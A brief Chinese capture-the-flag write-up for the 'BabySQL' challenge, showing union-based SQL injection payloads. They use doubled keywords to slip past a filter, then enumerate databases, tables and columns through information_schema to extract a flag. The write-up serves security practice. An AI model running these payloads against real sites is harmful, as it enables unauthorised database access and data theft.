BabySQL

尝试联合注入

1' union select 1#

发现只报错了1，推测被过滤，双写绕过

1' ununionion seselectlect 1 #

尝试到3后成功注入，有回显

1' ununionion seselectlect 1,2,3#

爆库

1' ununionion seselectlect 1,2,(selselectect database())#

爆所有库

这里我常用的语句

1' ununionion seselectlect 1,2,group_concat(distinct TABLE_SCHEMA) FRfromOM infoorrmation_schema.tables#

查了一下，wp用另一个表

1' ununionion seselectlect 1,2,group_concat(distinct SCHEMA_NAME)FRromOM
infoorrmation_schema.schemata#

这两个表都可以

查询表

1' ununionion seleselectct 1,2,group_concat(distinct TABLE_NAME) FRfromOM infoorrmation_schema.tables WHWHEREERE table_schema='ctf'#

查字段

1' ununionion seselectlect 1,2,
group_concat(COLUMN_NAME) frfromom infoorrmation_schema.columns whwhereere 
 table_name='Flag'#

查字段内容

1' ununionion seselectlect 1,2,
group_concat(flag) frfromom ctf.Flag#

Last updated 3 years ago